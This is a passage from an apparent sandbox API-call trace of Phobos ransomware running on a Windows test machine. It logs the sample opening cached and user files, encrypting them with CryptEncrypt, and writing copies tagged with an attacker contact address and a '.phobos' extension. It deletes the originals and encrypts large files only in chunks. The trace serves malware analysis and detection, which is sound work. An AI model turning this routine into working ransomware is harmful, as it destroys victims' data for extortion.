halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\rpc_shindig_random[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0188.642] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.642] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\rpc_shindig_random[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\rpc_shindig_random[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.643] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0188.643] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.643] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3112, lpOverlapped=0x0) returned 1 [0188.676] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3120, dwBufLen=0x3120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3120) returned 1 [0188.677] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3120, lpOverlapped=0x0) returned 1 [0188.678] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0188.678] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.678] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0188.678] CryptDestroyKey (hKey=0xa32de8) returned 1 [0188.678] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0188.678] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0188.678] CloseHandle (hObject=0x140) returned 1 [0188.678] CloseHandle (hObject=0x124) returned 1 [0188.678] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\rpc_shindig_random[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\rpc_shindig_random[1].js")) returned 1 [0188.705] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0188.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\uid[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\uid[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.705] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2611) returned 1 [0188.705] CloseHandle (hObject=0x178) returned 1 [0188.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\uid[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\uid[1].htm")) returned 0x2020 [0188.706] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\uid[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\uid[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\uid[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\uid[1].htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.706] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.706] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\uid[1].htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\uid[1].htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.709] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0188.709] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.709] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa33, lpOverlapped=0x0) returned 1 [0188.738] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa40, dwBufLen=0xa40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa40) returned 1 [0188.738] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xa40, lpOverlapped=0x0) returned 1 [0188.739] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0188.739] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.739] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0188.739] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0188.739] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0188.739] CryptDestroyKey (hKey=0xa32d28) returned 1 [0188.739] CloseHandle (hObject=0x178) returned 1 [0188.739] CloseHandle (hObject=0x124) returned 1 [0188.739] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\uid[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\uid[1].htm")) returned 1 [0188.742] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0188.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.743] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0188.743] CloseHandle (hObject=0x124) returned 1 [0188.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\desktop.ini")) returned 0x2006 [0188.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.743] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.743] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0188.839] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0188.839] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.839] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0188.840] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0188.840] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0188.858] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0188.859] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.859] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0188.859] CryptDestroyKey (hKey=0xa32c28) returned 1 [0188.859] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0188.862] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.865] CloseHandle (hObject=0x124) returned 1 [0188.865] CloseHandle (hObject=0x14c) returned 1 [0188.865] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\desktop.ini")) returned 1 [0188.867] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0188.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\msimgsiz.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0188.869] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16384) returned 1 [0188.869] CloseHandle (hObject=0x14c) returned 1 [0188.869] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\msimgsiz.dat")) returned 0x2020 [0188.869] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\MSIMGSIZ.DAT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\msimgsiz.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\msimgsiz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0188.869] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.869] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\MSIMGSIZ.DAT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\msimgsiz.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.870] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0188.870] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.870] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4000, lpOverlapped=0x0) returned 1 [0188.944] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4010, dwBufLen=0x4010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4010) returned 1 [0188.944] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4010, lpOverlapped=0x0) returned 1 [0188.945] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0188.945] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.945] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0188.945] CryptDestroyKey (hKey=0xa32c28) returned 1 [0188.945] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0188.945] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.945] CloseHandle (hObject=0x14c) returned 1 [0188.945] CloseHandle (hObject=0x124) returned 1 [0188.946] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\MSIMGSIZ.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\msimgsiz.dat")) returned 1 [0188.947] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0188.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\usrclass.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0188.948] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0188.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\WindowsUpdate.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\windowsupdate.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.949] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=0) returned 1 [0188.949] CloseHandle (hObject=0x124) returned 1 [0188.949] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0188.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.955] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2097152) returned 1 [0188.955] CloseHandle (hObject=0x124) returned 1 [0188.955] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log")) returned 0x2020 [0188.955] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0188.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.956] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0188.956] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0188.956] ReadFile (in: hFile=0x124, lpBuffer=0x34b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34b0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0188.981] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xaaaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0188.981] ReadFile (in: hFile=0x124, lpBuffer=0x34f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34f0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0189.008] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0189.008] ReadFile (in: hFile=0x124, lpBuffer=0x3530058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x3530058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0189.030] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc9c | out: phKey=0x2f4fc9c*=0xa32d28) returned 1 [0189.030] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0189.030] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0060) returned 1 [0189.037] CryptDestroyKey (hKey=0xa32d28) returned 1 [0189.037] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc78 | out: lpNewFilePointer=0x0) returned 1 [0189.037] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2f4fc88, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc88*=0xc0112, lpOverlapped=0x0) returned 1 [0189.058] SetEndOfFile (hFile=0x124) returned 1 [0189.058] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x1c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0189.058] WriteFile (in: hFile=0x124, 